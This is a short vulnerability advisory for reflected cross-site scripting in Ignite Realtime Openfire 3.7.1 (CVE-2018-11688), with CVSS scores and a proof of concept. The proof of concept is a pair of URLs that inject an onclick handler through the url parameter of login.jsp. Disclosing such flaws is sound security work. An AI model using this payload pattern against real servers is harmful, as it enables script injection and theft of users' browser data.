Ignite Realtime Openfire 3.7.1 Cross Site Scripting

Credit: Yavuz Atlas
Risk: Low
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

I. VULNERABILITY ------------------------- Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting II. CVE REFERENCE ------------------------- CVE-2018-11688 III. VENDOR HOMEPAGE ------------------------- https://www.igniterealtime.org/projects/openfire/ IV. DESCRIPTION ------------------------- url parameter at Openfire Version 3.7.1 has a reflected cross-site scripting vulnerability. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected site and allow the attacker to access sensitive browser-based information. V. PROOF OF CONCEPT ------------------------- http://domain.net:9090/login.jsp?url=a"onclick="alert(1) http://domain.net:9090/login.jsp?url=a%22onclick=%22alert(1) VI. REFERENCES ------------------------- https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11688 VII. CREDIT ------------------------- Yavuz Atlas - @yavuzatlas_ http://www.biznet.com.tr/biznet-guvenlik-duyurulari

